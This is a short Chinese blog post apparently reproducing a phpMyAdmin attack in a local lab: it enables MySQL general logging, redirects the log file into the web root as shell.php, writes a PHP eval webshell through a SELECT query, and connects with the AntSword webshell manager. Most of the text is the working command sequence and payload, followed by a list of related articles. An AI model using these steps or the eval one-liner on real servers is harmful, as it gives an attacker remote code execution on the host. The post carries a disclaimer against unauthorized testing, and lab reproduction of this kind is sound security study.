PhPMyadmin-漏洞复现

前情条件是:首先将我们的PHP版本设置在5.5以上 注:禁止用于未授权的测试!

首先搭建环境,登录后台

点击》》SQL

查看当前的日志状态

复制代码
  SHOW VARIABLES LIKE 'general%';

因为之前我原来做过所以general_log 是开启的,如果vlau 是OFF时,可以使用

set global general_log = "ON";打开日志

然后后面打开genera_log_file 写到网站目录下

复制代码
  set global general_log_file='D:\\phpstudy_pro\\WWW\\pikachu-master\\shell.php'
前提是知道网站目录下

查看日志,​​看更改日志文件路径是否成功

日志文件里写入一句话木马

复制代码
  select '<?php @eval($_POST[cmd]);?>';

访问一下shell.php

复制代码
  http://pikachu-master/shell.php

能够成功访问

然后适用蚁剑连接

成功连接

相关推荐
QYR-分析6 小时前
机器人安全控制器行业高速扩容 本土替代迎来全新发展窗口期
人工智能·安全·机器人
IpdataCloud7 小时前
担心IP暴露隐私?用安全IP查询工具自查,三步配置网络出口
网络·tcp/ip·安全·ip
JerrySir11 小时前
恶意 npm 包只活了 17 分钟:技术面试里,为什么“升级依赖”还不算止血?
javascript·安全
白帽小阳11 小时前
2026前端面试题!(附答案及解析)
javascript·网络·python·安全·web安全·网络安全·护网行动
xd18557855512 小时前
电影匹配引擎-基于鸿蒙的心情电影推荐应用开发实践
人工智能·安全·华为·harmonyos·鸿蒙
白帽小阳12 小时前
[特殊字符]【2026最新】零基础入门学网络安全(详细路线图),看这篇就够了!
学习·安全·web安全·网络安全·安全运营·学习路线·web渗透
qetfw13 小时前
CentOS 7 配置 iptables 防火墙
安全
磐链科技14 小时前
区块链链游安全警示:常见漏洞与攻击手段
安全·区块链
数据知道15 小时前
HTTP/HTTPS 安全深度剖析:抓包、解密与证书陷阱
安全·http·https·mitmproxy·抓包解密
AI创界者16 小时前
安全测试环境搭建:在 Kali Linux 中部署与配置开源 WebShell 管理工具 AntSword(蚁剑)
linux·运维·安全